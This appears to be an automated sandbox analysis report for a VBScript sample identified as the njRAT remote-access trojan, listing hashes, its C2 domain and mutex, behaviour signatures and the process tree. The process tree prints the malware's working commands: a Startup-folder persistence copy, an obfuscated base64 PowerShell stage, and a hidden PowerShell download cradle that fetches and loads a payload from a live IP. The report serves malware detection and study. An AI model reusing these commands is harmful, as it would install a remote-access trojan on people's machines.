Analysis
-
max time kernel
149s -
max time network
139s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
21-12-2021 15:00
General
-
Target
bc1df94edc704d4be73eb5e91c2331be.vbs
-
Size
151KB
-
MD5
bc1df94edc704d4be73eb5e91c2331be
-
SHA1
18d6f490b6a99d8a17df13c0bd037fd56e215d8c
-
SHA256
946bd0343beb66996e777f0f7b83143053aa574ddaae249fae927795891a0363
-
SHA512
1c6af4ec257a33e365dc43b278fbbbd4e127cfe1b89974c871425b8165b30c374707eac15deaeb7b4bb869159d9d4271951dc7ce28cf062f9c147278018b1d61
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://91.241.19.49/ramdes/DownloaderF3.txt
Extracted
Family
njrat
Version
0.7NC
Botnet
NYAN CAT
C2
revg.duckdns.org:57831
Mutex
ebef4abe57d24e8
Attributes
-
reg_key
ebef4abe57d24e8
-
splitter
@!#&^%$
Signatures
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
Blocklisted process makes network request 1 IoCs
-
Drops startup file 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 36 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bc1df94edc704d4be73eb5e91c2331be.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\bc1df94edc704d4be73eb5e91c2331be.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ FAH.vbs')2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- Runs ping.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\bc1df94edc704d4be73eb5e91c2331be.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ FAH.vbs')3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
c6b0a774fa56e0169ed7bb7b25c114dd
SHA1bcdba7d4ecfff2180510850e585b44691ea81ba5
SHA256b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9
SHA51242295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
8081d7d0beea2c77923793b863bd136a
SHA1c01ff189d955f9d6923a79a7611fa9eb4233122b
SHA256ad122ea0c66ddd5529db00bbeebffab42f8576b2a2e1b80ee678bf8df0fe4db7
SHA5125375caac975a7469f08b7f53ec7c96a02089f7607617ab81ad51a38e3ce61e12b793b3950e075cd32193e540babe36d8d31c656d2acba982a6188663e9f05641
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
b2e3474d824e227a0a9fcc275b3e34df
SHA1ba2aa1550f80d92786b2898593bd9abbbcd63298
SHA256cf21ab7de89e027a7c74e8342d0f011a6f63bafe48bf43c6f9d9e274a9c230a3
SHA5124a1f62f64bc2c085ce06c2d867296d40207ace73c640c56db68d8e415d89e7968c3a404274901836f430a2e0c0ad91ec7b9bc96c52ca4b0e3bac3c0581322d0b
-
memory/2420-142-0x000001B2B6BF0000-0x000001B2B6BF2000-memory.dmpFilesize
8KB
-
memory/2420-178-0x000001B2B6BF0000-0x000001B2B6BF2000-memory.dmpFilesize
8KB
-
memory/2420-151-0x000001B2B6CE0000-0x000001B2B6CE2000-memory.dmpFilesize
8KB
-
memory/2420-145-0x000001B2B6BF0000-0x000001B2B6BF2000-memory.dmpFilesize
8KB
-
memory/2420-144-0x000001B2B6BF0000-0x000001B2B6BF2000-memory.dmpFilesize
8KB
-
memory/2420-134-0x000001B2B6BF0000-0x000001B2B6BF2000-memory.dmpFilesize
8KB
-
memory/2420-141-0x000001B2B6BF0000-0x000001B2B6BF2000-memory.dmpFilesize
8KB
-
memory/2420-152-0x000001B2B6CE3000-0x000001B2B6CE5000-memory.dmpFilesize
8KB
-
memory/2420-139-0x000001B2B6BF0000-0x000001B2B6BF2000-memory.dmpFilesize
8KB
-
memory/2420-137-0x000001B2B6BF0000-0x000001B2B6BF2000-memory.dmpFilesize
8KB
-
memory/2420-136-0x000001B2B6BF0000-0x000001B2B6BF2000-memory.dmpFilesize
8KB
-
memory/2420-179-0x000001B2B6CE6000-0x000001B2B6CE8000-memory.dmpFilesize
8KB
-
memory/2420-135-0x000001B2B6BF0000-0x000001B2B6BF2000-memory.dmpFilesize
8KB
-
memory/2420-132-0x0000000000000000-mapping.dmp
-
memory/2556-148-0x0000026E7A026000-0x0000026E7A028000-memory.dmpFilesize
8KB
-
memory/2556-124-0x0000026E60060000-0x0000026E60062000-memory.dmpFilesize
8KB
-
memory/2556-129-0x0000026E7A020000-0x0000026E7A022000-memory.dmpFilesize
8KB
-
memory/2556-130-0x0000026E7A023000-0x0000026E7A025000-memory.dmpFilesize
8KB
-
memory/2556-127-0x0000026E60060000-0x0000026E60062000-memory.dmpFilesize
8KB
-
memory/2556-126-0x0000026E79F40000-0x0000026E79F41000-memory.dmpFilesize
4KB
-
memory/2556-125-0x0000026E60060000-0x0000026E60062000-memory.dmpFilesize
8KB
-
memory/2556-118-0x0000026E60060000-0x0000026E60062000-memory.dmpFilesize
8KB
-
memory/2556-123-0x0000026E60060000-0x0000026E60062000-memory.dmpFilesize
8KB
-
memory/2556-122-0x0000026E61E70000-0x0000026E61E71000-memory.dmpFilesize
4KB
-
memory/2556-121-0x0000026E60060000-0x0000026E60062000-memory.dmpFilesize
8KB
-
memory/2556-117-0x0000000000000000-mapping.dmp
-
memory/2556-120-0x0000026E60060000-0x0000026E60062000-memory.dmpFilesize
8KB
-
memory/2556-119-0x0000026E60060000-0x0000026E60062000-memory.dmpFilesize
8KB
-
memory/2556-131-0x0000026E60060000-0x0000026E60062000-memory.dmpFilesize
8KB
-
memory/2836-115-0x0000000000000000-mapping.dmp
-
memory/2860-159-0x000002BB92920000-0x000002BB92922000-memory.dmpFilesize
8KB
-
memory/2860-173-0x000002BBAB110000-0x000002BBAB126000-memory.dmpFilesize
88KB
-
memory/2860-154-0x000002BB92920000-0x000002BB92922000-memory.dmpFilesize
8KB
-
memory/2860-156-0x000002BB92920000-0x000002BB92922000-memory.dmpFilesize
8KB
-
memory/2860-157-0x000002BB92920000-0x000002BB92922000-memory.dmpFilesize
8KB
-
memory/2860-153-0x000002BB92920000-0x000002BB92922000-memory.dmpFilesize
8KB
-
memory/2860-160-0x000002BB92920000-0x000002BB92922000-memory.dmpFilesize
8KB
-
memory/2860-162-0x000002BB92920000-0x000002BB92922000-memory.dmpFilesize
8KB
-
memory/2860-168-0x000002BB92920000-0x000002BB92922000-memory.dmpFilesize
8KB
-
memory/2860-170-0x000002BB92943000-0x000002BB92945000-memory.dmpFilesize
8KB
-
memory/2860-169-0x000002BB92940000-0x000002BB92942000-memory.dmpFilesize
8KB
-
memory/2860-171-0x000002BB92946000-0x000002BB92948000-memory.dmpFilesize
8KB
-
memory/2860-172-0x000002BBAB0E0000-0x000002BBAB0E6000-memory.dmpFilesize
24KB
-
memory/2860-150-0x000002BB92920000-0x000002BB92922000-memory.dmpFilesize
8KB
-
memory/2860-147-0x0000000000000000-mapping.dmp
-
memory/2860-149-0x000002BB92920000-0x000002BB92922000-memory.dmpFilesize
8KB
-
memory/2860-176-0x000002BB92920000-0x000002BB92922000-memory.dmpFilesize
8KB
-
memory/3496-174-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/3496-175-0x000000000040676E-mapping.dmp
-
memory/3496-182-0x0000000005520000-0x0000000005521000-memory.dmpFilesize
4KB
-
memory/3496-183-0x0000000005AE0000-0x0000000005AE1000-memory.dmpFilesize
4KB
-
memory/3496-184-0x0000000005790000-0x0000000005791000-memory.dmpFilesize
4KB
-
memory/3496-185-0x00000000055E0000-0x0000000005ADE000-memory.dmpFilesize
5.0MB
-
memory/3496-186-0x0000000005730000-0x0000000005731000-memory.dmpFilesize
4KB
-
memory/3496-187-0x0000000005960000-0x0000000005961000-memory.dmpFilesize
4KB
-
memory/3628-116-0x0000000000000000-mapping.dmp